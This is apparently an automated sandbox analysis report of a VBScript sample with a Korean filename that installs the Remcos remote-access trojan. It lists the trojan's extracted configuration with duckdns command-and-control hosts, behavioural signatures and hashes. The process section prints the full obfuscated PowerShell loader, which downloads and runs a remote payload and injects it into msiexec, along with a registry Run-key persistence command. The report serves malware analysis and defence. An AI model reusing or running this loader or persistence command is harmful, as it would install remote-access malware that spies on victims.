Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-12-2024 06:25
Static task
static1
Behavioral task
behavioral1
Sample
화물_계획__부 가능_계획_pdg.vbs
Resource
win7-20240903-en
General
-
Target
화물_계획__부 가능_계획_pdg.vbs
-
Size
35KB
-
MD5
4c39309bcbb9c031d27c488bac0ed6ec
-
SHA1
29e1270f6a8eaa63fa37f33760a3a1d33e807863
-
SHA256
2b9370b8bd4cf96c6b5f44b84e74a767fa5182ab30638fce31de2616aa01ab50
-
SHA512
928eeb213f33f015a6424506c2a8d023e636cddc8392774df829dfb56cb22ddc4ccae611f33527665a33d5692e0672d38b0979ddfb86ff4883047cafa0c3aa86
-
SSDEEP
384:65cVCJUSNoVEItu5uBHNIc6n+210mlT5Ve3qOGHr84F4K:65cXSNhCu5qNIc6+2HlNMqOOr8gx
Malware Config
Extracted
remcos
Fresh
dourtes4hnbouy1.duckdns.org:2487
dourtes4hnbouy1.duckdns.org:2488
dourtes4hnbouy2.duckdns.org:2487
dourtes4hnbouy3.duckdns.org:2487
dourtes4hnbouy4.duckdns.org:2487
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
kamzourts.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
kamncbiu-LBXP9X
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 7 IoCs
flow pid Process 5 4004 WScript.exe 11 4472 powershell.exe 37 2056 msiexec.exe 39 2056 msiexec.exe 41 2056 msiexec.exe 45 2056 msiexec.exe 47 2056 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rhabdosphere = "%nervemediciners% -windowstyle 1 $Decoke247=(gp -Path 'HKCU:\\Software\\Extratemporal\\').Konkursbegringer;%nervemediciners% ($Decoke247)" reg.exe -
pid Process 4472 powershell.exe 2936 powershell.exe -
pid Process 4472 powershell.exe 2936 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2056 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2936 powershell.exe 2056 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4324 reg.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 4472 powershell.exe 4472 powershell.exe 2936 powershell.exe 2936 powershell.exe 2936 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2936 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4472 powershell.exe Token: SeDebugPrivilege 2936 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2056 msiexec.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4004 wrote to memory of 4472 4004 WScript.exe 83 PID 4004 wrote to memory of 4472 4004 WScript.exe 83 PID 2936 wrote to memory of 2056 2936 powershell.exe 100 PID 2936 wrote to memory of 2056 2936 powershell.exe 100 PID 2936 wrote to memory of 2056 2936 powershell.exe 100 PID 2936 wrote to memory of 2056 2936 powershell.exe 100 PID 2056 wrote to memory of 3760 2056 msiexec.exe 104 PID 2056 wrote to memory of 3760 2056 msiexec.exe 104 PID 2056 wrote to memory of 3760 2056 msiexec.exe 104 PID 3760 wrote to memory of 4324 3760 cmd.exe 107 PID 3760 wrote to memory of 4324 3760 cmd.exe 107 PID 3760 wrote to memory of 4324 3760 cmd.exe 107
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\화물_계획__부 가능_계획_pdg.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Arrenotokous='Homogeniserendes';;$Gorged='Woodless';;$Ramuliferous='Udbyttekonfiskationernes';;$Origenize='Anrettede';;$Stbningen=$host.Name;function Grecized($Roburite){If ($Stbningen) {$Scyphopolyp=5} for ($Doucepere=$Scyphopolyp;;$Doucepere+=6){if(!$Roburite[$Doucepere]) { break };$Indkringsfases+=$Roburite[$Doucepere];$Nonvaporousness='Turboladers'}$Indkringsfases}function Indpiskedes($Solbatterier){ .($Afkrydser) ($Solbatterier)}$Douceperensignificance=Grecized 'SkndsnNonreESkovstAssol.Ove tW';$Douceperensignificance+=Grecized ' .upeEReserBEfterC I aulSmu tiMo faeJerseN Monat';$Percussiveness=Grecized 'Haa tMSensio,kitjzFlashi ForllTerbel T.lgaDagpl/';$Khz=Grecized ' BrugTko tolTrmassTele.1error2';$Naturalisterne='Purpo[Tom uN InsueResert ande. eskSFnotyE RuslRTekstvEnh dIGy.efCTe riEWondePSpr eO T psi D wnn BridtFattiM ReedAFas lN aadeaB saeg nwiESm glRPalla]Rack :Menne: SrboSenginE O blC CompUOutj.r aziIRattlt Ko ayDermaPAfgifr O.enOPhenoTudlbeO irkucNoncooTransL Data= Bqnh$ CossKPreseHWelteZ';$Percussiveness+=Grecized 'B ewa5Xanth.Neapo0honno Vaske(PhlebWPteroiHypernAlloddAnthro BolvwFiantsScyth TzitzN ProsT Fo g St.rk1Forma0Ml ek.Videb0Vicar;Capt Bo.erWLnnetiUds.enChaet6Sedde4Langh;Baand anvisxOverl6Kultu4 coac;Refa Indlar TyndvLngod: Saml1Ety o3Nedsl1 k in.Tranq0 r gr) oggi .iscoG .aboeMicrocEru akLecthoAmapa/Radi 2Micro0Disti1g und0 Con 0 Hirs1Sla b0 ight1Urege UnnatFOpsnuiLgtnir FilteAlitafEncomo IndoxEkstr/Udfre1 ap,e3Eff k1I,ter.Bund 0';$Cliqueless106=Grecized ' Ne vUCa nesSigteeGaardrNahan-EyolfAHmsk.GRearmEH.cksNStandt';$Anarchy=Grecized ' UnshhTitictRustit KartpRanvesValut: ric/Mod r/YoupdsEsophhVaabea FasaaAutomv KorriStimupFormurRe ayoAlchef P ure SuccsU,delsObseriNonfioB.slunUnwalaF millOverg. SkifcH peioAutoommis i/ Ph nTProlohCircuiaffilaHjernzApodai magonPleaseRagef.RabarpSnders c mbd Str >PalaihOligotbrkmit,agenphostasSknki:D nat/Uncon/Tur.ue Ro lxKnledpConsolf ancoDrivrr,leckeAutolm TowseL avesInteroUnmeepLkkesoMatrotUnspiaPreyemElskviSonofaPemo..glomucOplanoByzanmTrili/ wretT rothBle,siOccasah.nknz NoneiSpd,rnT msve Chee.Paatap ,tinsirrevd';$Unreadable=Grecized 'hesit>';$Afkrydser=Grecized 'AdreniHotteeOphthX';$Sexdigitated='Stereoscopically';$ringeklokkers='\conventionalises.Tnd';Indpiskedes (Grecized 'Fnblg$N.rsegSup.rLForhaO SuprBPostvA ReinLNonfe: NonmDBusk.eTawatukieyet dloeEPreinrRingeOToetag,nfereEvighlOrthoA.nchatPri,toFraflSforlnEEngan=Skamb$ mophE femNtilbavStict:Unp.rAOver pInostpTalacdPositADistrt rykAHypov+Bibac$MasseROi pliIndusN OutsgKlippE Lov KSipprLSubt,ODggelK hertk AngoESneglRMurenS');Indpiskedes (Grecized 'Sem r$ BabigC llelRun,soSkrivBBidcoAGr aalm.nuf: NounTS nseJProdueTrashN .rseEChut,SScy,htOptomEVeridYDrabsD FineeThoralTrykksDri teForhon ThouSschel=Dunga$IsotraF rstnorb la erdsrepihyc SnakhHalvkyHedas.Ciff SStifip ColllIndicIGynanTSymph(Demon$idefouExpiaNPoin.Rsha.nECredeA RoadDNummeaBowleB XeroL lyk,eMuseo)');Indpiskedes (Grecized $Naturalisterne);$Anarchy=$tjenesteydelsens[0];$Carpodetus=(Grecized ' emal$ Respg De.oLRupicOOrdfoBthuggaUprail,cytt: Cochg fbilADomflAEtc iTSpo.sC ,rouhUn.cr=OverbnEluviE Norww Hype-Pern.oCoadvbBromijParasEI,strc ugnTSodom MathiS PleiYIns fSUdiscT inge UnhamOprrs.D nta$Crib dIsomeo UdryuPassicSigtvEShairP RygeEint,nRSp one S ygntidsbsUp avIMy,paG naxoN NonaiCoenafquetziSouthcBatraaAnalynUdsmycOpspae');Indpiskedes ($Carpodetus);Indpiskedes (Grecized 'Kv,av$ Ettyg KoloaPilleaDagsot Lu tcAnti hDesti.b aavH PakeeP lycalu efdBekereHelgorFagsps Unne[Sandw$ola sC elfilI proimagneq slinuM nteeDerogl GesneNonclsO torsEkstr1G.aas0Br,ds6Rotte]Plnek=Poeci$ VentPAspideOdin.rStaphcHidfrustavnsHe tesdes ai AttavEri.oeFibernFiltreCemens Chars');$Drvogternes=Grecized 'D.mna$KundggudmaraS edbaFogdet PartcDatabhBrnee.Co,biD ntihoAllelw Sy pnDiffulP oceoCompua OpsldTrailFH rebi PretlVi keeUppe,(Azte $.xcisAAarrina.etyaUddatrSkaa,cAdrtthTr,deyNongl,Retor$merglVDad.iaFlaskr FolkiCustogAst gh u vaeSud nd WronsFauntkseamrrVedkeaSeacovFastseOv retAspirsRecon)';$Varighedskravets=$Deuterogelatose;Indpiskedes (Grecized ' Tele$Gran g anelLSailfOCommyB U trA KernlCera.:C,balWJom ri VassLAlohalPostuA Klos=Bygni( nemeTBelize k ooS MombT aeri-Sags PGas rAsalmetRi bahSt am Ja z$VagarV HjemA BongrImitaIKanthgScrewhEfterEE staDGenitSbyronksertuRRestiAOu daVLachrEOtopit NvniSSeri )');while (!$Willa) {Indpiskedes (Grecized ' kitt$agadigKdebrl EmbooJuniobCryptaGladelJowel:ButteVSt.ckrLairig Ti,seThreanFuturdInsu,eDyrlg=Soveh$S rreOTam svSombreMoresrM entsAspirp rprgnexe udGlib t') ;Indpiskedes $Drvogternes;Indpiskedes (Grecized 'consts onttNeuroAPhalarGimpeTSk kt-UnmatSApparL FrakEVbnerEPr pop Regn Outdr4');Indpiskedes (Grecized 'Antip$GroungKrliglElutrO,xtrabRutefa nusiLStorm: U.rewClif,ICho.lLRe lalUsandASmoot=Binds(SkibstforgieChertsFishitPru t- OffiPPl ylA God,TBuck h Bibl Minus$Cli cvMi enaAlbumRBaronI Be hgAnskah xbeESt krDGenneS DaikkUnd.rRGlideAEndesVJourneNeds TnringsKatte)') ;Indpiskedes (Grecized 'Accel$ArillgShorelIlgodoRet rBD kumAPreselGiggl:VejleU IsooNBjergR Ot mIKylliPRyttepEud.eESkyttdCarpe=Soden$Subtog KardLCrushOTiggebRivinA Emb.lRedig: BasucTeaterKulkaOProtof Fulgt LagkS open+Flams+Pseud%,nspn$ eadot nalJKrediE CoernsaluteFor lSSnudeT TeddE lusy ElecDS uble TelelBacteSHimmeEFruenNexurgSUnoe .Fl keCJanniOSalthU Pos.nRestaT') ;$Anarchy=$tjenesteydelsens[$Unripped]}$Styrelses=287680;$Befile=33163;Indpiskedes (Grecized 'R.frn$RrhneGCylinLfa geoblackbAfgreain omLCente:V gnesHaustK S,roPBesnipDag ee supes Poli Ne.le=Gasse .arimGwindoeEventTIrske-ImidscIndvnoFormoNfeodotAffale PreinCarpotSk,ms Exsan$Progrvout.oAC relRIge,viS nkoGwait HTaffeELokalDAarstSJon uKAmfibR OpkaA Reolv TectEJimmiTLejr s');Indpiskedes (Grecized 'Ca,ry$SericgInv llApoteoOpdagbXerifaspecilS vne:Fo dsEBystekButtosAnelae Topsr MorncUdskie Ether O ereGuld.nTrkpadSmorzeOutpo3 name Ud ik=Ta ab Outr [HydroSAntagy SocisAmitytCenteeVaccemArbit.RenteCDunneoRh,omnTri,rvStbeseFagelrJordetMithr] Fogl:Mem n: C rcFFundrr DgnroStenkmUnderB ModtaProdus,loore Sta 6Alacr4S,illSetapet Kr.nrPerveibiodynCyklcgF,ura(Prep $VanrgS OpnakHoar p VerdpDivereNositsTapet)');Indpiskedes (Grecized ',ohre$B.ssiGFouril.mbibO.ovedbDemo aBi eslSbebo:DdsboPEntydRResorI Ame.S AntioSaltkPamadoldefm,Y abilsInappNEvakuIHroa nMo dagKol rEThrowrLurki Trinf=Konto Opfyl[ClasmsEks kyKrsels Mid tSevenehollomRive .Ac letReloaeAnmelxExce.TRival.T lskESamarNspr ncDeviaOTildrDKbma Ipap lNTransGBlotc]Skibs:Legio: KvalAOverpsHermicDissoIFathoi Sulp. StavGTerr EChedetAbnorsPancaT N nvRGuideIWise n onjgH avy(round$PujarECalipkHan.eS .ontEDitmarSubobcH,larE verkrPolype ConjNUnharDEduafEA.tie3Ki no)');Indpiskedes (Grecized 'Samle$ BathgRetraLDropsoBrdk BRijksAKofftlForgp:NedveUPrelodCertaK Sk,fO p,ccbMillilEj rleArrog2 Su c3palmi4Anton= Conv$LipohpnaissRMagtsI .iriS ndatOSkolePFalc,LUranoyCres Srekrun Maili H moNSge oGSag eeI idiRBebo .OmplaS fad.uSkaerbBrddes Mestt ref,rRe orIfrysen KubiGhjsan(sta,e$g.rlesLibelTDriftYDolkerAfslrEMyrssLS.idsSem usE fo,kS Nonc, ,kat$Surr,BCope eCannufSt esI,ldslL artrEGyasd)');Indpiskedes $Udkoble234;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4472
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Arrenotokous='Homogeniserendes';;$Gorged='Woodless';;$Ramuliferous='Udbyttekonfiskationernes';;$Origenize='Anrettede';;$Stbningen=$host.Name;function Grecized($Roburite){If ($Stbningen) {$Scyphopolyp=5} for ($Doucepere=$Scyphopolyp;;$Doucepere+=6){if(!$Roburite[$Doucepere]) { break };$Indkringsfases+=$Roburite[$Doucepere];$Nonvaporousness='Turboladers'}$Indkringsfases}function Indpiskedes($Solbatterier){ .($Afkrydser) ($Solbatterier)}$Douceperensignificance=Grecized 'SkndsnNonreESkovstAssol.Ove tW';$Douceperensignificance+=Grecized ' .upeEReserBEfterC I aulSmu tiMo faeJerseN Monat';$Percussiveness=Grecized 'Haa tMSensio,kitjzFlashi ForllTerbel T.lgaDagpl/';$Khz=Grecized ' BrugTko tolTrmassTele.1error2';$Naturalisterne='Purpo[Tom uN InsueResert ande. eskSFnotyE RuslRTekstvEnh dIGy.efCTe riEWondePSpr eO T psi D wnn BridtFattiM ReedAFas lN aadeaB saeg nwiESm glRPalla]Rack :Menne: SrboSenginE O blC CompUOutj.r aziIRattlt Ko ayDermaPAfgifr O.enOPhenoTudlbeO irkucNoncooTransL Data= Bqnh$ CossKPreseHWelteZ';$Percussiveness+=Grecized 'B ewa5Xanth.Neapo0honno Vaske(PhlebWPteroiHypernAlloddAnthro BolvwFiantsScyth TzitzN ProsT Fo g St.rk1Forma0Ml ek.Videb0Vicar;Capt Bo.erWLnnetiUds.enChaet6Sedde4Langh;Baand anvisxOverl6Kultu4 coac;Refa Indlar TyndvLngod: Saml1Ety o3Nedsl1 k in.Tranq0 r gr) oggi .iscoG .aboeMicrocEru akLecthoAmapa/Radi 2Micro0Disti1g und0 Con 0 Hirs1Sla b0 ight1Urege UnnatFOpsnuiLgtnir FilteAlitafEncomo IndoxEkstr/Udfre1 ap,e3Eff k1I,ter.Bund 0';$Cliqueless106=Grecized ' Ne vUCa nesSigteeGaardrNahan-EyolfAHmsk.GRearmEH.cksNStandt';$Anarchy=Grecized ' UnshhTitictRustit KartpRanvesValut: ric/Mod r/YoupdsEsophhVaabea FasaaAutomv KorriStimupFormurRe ayoAlchef P ure SuccsU,delsObseriNonfioB.slunUnwalaF millOverg. SkifcH peioAutoommis i/ Ph nTProlohCircuiaffilaHjernzApodai magonPleaseRagef.RabarpSnders c mbd Str >PalaihOligotbrkmit,agenphostasSknki:D nat/Uncon/Tur.ue Ro lxKnledpConsolf ancoDrivrr,leckeAutolm TowseL avesInteroUnmeepLkkesoMatrotUnspiaPreyemElskviSonofaPemo..glomucOplanoByzanmTrili/ wretT rothBle,siOccasah.nknz NoneiSpd,rnT msve Chee.Paatap ,tinsirrevd';$Unreadable=Grecized 'hesit>';$Afkrydser=Grecized 'AdreniHotteeOphthX';$Sexdigitated='Stereoscopically';$ringeklokkers='\conventionalises.Tnd';Indpiskedes (Grecized 'Fnblg$N.rsegSup.rLForhaO SuprBPostvA ReinLNonfe: NonmDBusk.eTawatukieyet dloeEPreinrRingeOToetag,nfereEvighlOrthoA.nchatPri,toFraflSforlnEEngan=Skamb$ mophE femNtilbavStict:Unp.rAOver pInostpTalacdPositADistrt rykAHypov+Bibac$MasseROi pliIndusN OutsgKlippE Lov KSipprLSubt,ODggelK hertk AngoESneglRMurenS');Indpiskedes (Grecized 'Sem r$ BabigC llelRun,soSkrivBBidcoAGr aalm.nuf: NounTS nseJProdueTrashN .rseEChut,SScy,htOptomEVeridYDrabsD FineeThoralTrykksDri teForhon ThouSschel=Dunga$IsotraF rstnorb la erdsrepihyc SnakhHalvkyHedas.Ciff SStifip ColllIndicIGynanTSymph(Demon$idefouExpiaNPoin.Rsha.nECredeA RoadDNummeaBowleB XeroL lyk,eMuseo)');Indpiskedes (Grecized $Naturalisterne);$Anarchy=$tjenesteydelsens[0];$Carpodetus=(Grecized ' emal$ Respg De.oLRupicOOrdfoBthuggaUprail,cytt: Cochg fbilADomflAEtc iTSpo.sC ,rouhUn.cr=OverbnEluviE Norww Hype-Pern.oCoadvbBromijParasEI,strc ugnTSodom MathiS PleiYIns fSUdiscT inge UnhamOprrs.D nta$Crib dIsomeo UdryuPassicSigtvEShairP RygeEint,nRSp one S ygntidsbsUp avIMy,paG naxoN NonaiCoenafquetziSouthcBatraaAnalynUdsmycOpspae');Indpiskedes ($Carpodetus);Indpiskedes (Grecized 'Kv,av$ Ettyg KoloaPilleaDagsot Lu tcAnti hDesti.b aavH PakeeP lycalu efdBekereHelgorFagsps Unne[Sandw$ola sC elfilI proimagneq slinuM nteeDerogl GesneNonclsO torsEkstr1G.aas0Br,ds6Rotte]Plnek=Poeci$ VentPAspideOdin.rStaphcHidfrustavnsHe tesdes ai AttavEri.oeFibernFiltreCemens Chars');$Drvogternes=Grecized 'D.mna$KundggudmaraS edbaFogdet PartcDatabhBrnee.Co,biD ntihoAllelw Sy pnDiffulP oceoCompua OpsldTrailFH rebi PretlVi keeUppe,(Azte $.xcisAAarrina.etyaUddatrSkaa,cAdrtthTr,deyNongl,Retor$merglVDad.iaFlaskr FolkiCustogAst gh u vaeSud nd WronsFauntkseamrrVedkeaSeacovFastseOv retAspirsRecon)';$Varighedskravets=$Deuterogelatose;Indpiskedes (Grecized ' Tele$Gran g anelLSailfOCommyB U trA KernlCera.:C,balWJom ri VassLAlohalPostuA Klos=Bygni( nemeTBelize k ooS MombT aeri-Sags PGas rAsalmetRi bahSt am Ja z$VagarV HjemA BongrImitaIKanthgScrewhEfterEE staDGenitSbyronksertuRRestiAOu daVLachrEOtopit NvniSSeri )');while (!$Willa) {Indpiskedes (Grecized ' kitt$agadigKdebrl EmbooJuniobCryptaGladelJowel:ButteVSt.ckrLairig Ti,seThreanFuturdInsu,eDyrlg=Soveh$S rreOTam svSombreMoresrM entsAspirp rprgnexe udGlib t') ;Indpiskedes $Drvogternes;Indpiskedes (Grecized 'consts onttNeuroAPhalarGimpeTSk kt-UnmatSApparL FrakEVbnerEPr pop Regn Outdr4');Indpiskedes (Grecized 'Antip$GroungKrliglElutrO,xtrabRutefa nusiLStorm: U.rewClif,ICho.lLRe lalUsandASmoot=Binds(SkibstforgieChertsFishitPru t- OffiPPl ylA God,TBuck h Bibl Minus$Cli cvMi enaAlbumRBaronI Be hgAnskah xbeESt krDGenneS DaikkUnd.rRGlideAEndesVJourneNeds TnringsKatte)') ;Indpiskedes (Grecized 'Accel$ArillgShorelIlgodoRet rBD kumAPreselGiggl:VejleU IsooNBjergR Ot mIKylliPRyttepEud.eESkyttdCarpe=Soden$Subtog KardLCrushOTiggebRivinA Emb.lRedig: BasucTeaterKulkaOProtof Fulgt LagkS open+Flams+Pseud%,nspn$ eadot nalJKrediE CoernsaluteFor lSSnudeT TeddE lusy ElecDS uble TelelBacteSHimmeEFruenNexurgSUnoe .Fl keCJanniOSalthU Pos.nRestaT') ;$Anarchy=$tjenesteydelsens[$Unripped]}$Styrelses=287680;$Befile=33163;Indpiskedes (Grecized 'R.frn$RrhneGCylinLfa geoblackbAfgreain omLCente:V gnesHaustK S,roPBesnipDag ee supes Poli Ne.le=Gasse .arimGwindoeEventTIrske-ImidscIndvnoFormoNfeodotAffale PreinCarpotSk,ms Exsan$Progrvout.oAC relRIge,viS nkoGwait HTaffeELokalDAarstSJon uKAmfibR OpkaA Reolv TectEJimmiTLejr s');Indpiskedes (Grecized 'Ca,ry$SericgInv llApoteoOpdagbXerifaspecilS vne:Fo dsEBystekButtosAnelae Topsr MorncUdskie Ether O ereGuld.nTrkpadSmorzeOutpo3 name Ud ik=Ta ab Outr [HydroSAntagy SocisAmitytCenteeVaccemArbit.RenteCDunneoRh,omnTri,rvStbeseFagelrJordetMithr] Fogl:Mem n: C rcFFundrr DgnroStenkmUnderB ModtaProdus,loore Sta 6Alacr4S,illSetapet Kr.nrPerveibiodynCyklcgF,ura(Prep $VanrgS OpnakHoar p VerdpDivereNositsTapet)');Indpiskedes (Grecized ',ohre$B.ssiGFouril.mbibO.ovedbDemo aBi eslSbebo:DdsboPEntydRResorI Ame.S AntioSaltkPamadoldefm,Y abilsInappNEvakuIHroa nMo dagKol rEThrowrLurki Trinf=Konto Opfyl[ClasmsEks kyKrsels Mid tSevenehollomRive .Ac letReloaeAnmelxExce.TRival.T lskESamarNspr ncDeviaOTildrDKbma Ipap lNTransGBlotc]Skibs:Legio: KvalAOverpsHermicDissoIFathoi Sulp. StavGTerr EChedetAbnorsPancaT N nvRGuideIWise n onjgH avy(round$PujarECalipkHan.eS .ontEDitmarSubobcH,larE verkrPolype ConjNUnharDEduafEA.tie3Ki no)');Indpiskedes (Grecized 'Samle$ BathgRetraLDropsoBrdk BRijksAKofftlForgp:NedveUPrelodCertaK Sk,fO p,ccbMillilEj rleArrog2 Su c3palmi4Anton= Conv$LipohpnaissRMagtsI .iriS ndatOSkolePFalc,LUranoyCres Srekrun Maili H moNSge oGSag eeI idiRBebo .OmplaS fad.uSkaerbBrddes Mestt ref,rRe orIfrysen KubiGhjsan(sta,e$g.rlesLibelTDriftYDolkerAfslrEMyrssLS.idsSem usE fo,kS Nonc, ,kat$Surr,BCope eCannufSt esI,ldslL artrEGyasd)');Indpiskedes $Udkoble234;"1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rhabdosphere" /t REG_EXPAND_SZ /d "%nervemediciners% -windowstyle 1 $Decoke247=(gp -Path 'HKCU:\Software\Extratemporal\').Konkursbegringer;%nervemediciners% ($Decoke247)"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rhabdosphere" /t REG_EXPAND_SZ /d "%nervemediciners% -windowstyle 1 $Decoke247=(gp -Path 'HKCU:\Software\Extratemporal\').Konkursbegringer;%nervemediciners% ($Decoke247)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4324
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
417KB
MD5b8267bb25d5a59bcecb954056bbccd90
SHA127984573c59bf3e2d726f3b7b011671caf50fa38
SHA2568b9e7d853510e474c2781553ba6a59cd2483b30603923a36cd7a9c1ea40b9b3e
SHA51224aeca3998b197f92ab19a24cf954195fbfa1026dcc19a0e3414ee2ab1cb86afc3e12686b72faeda510288233f57c979b4731f484b96be4429325cadc7d4c4ad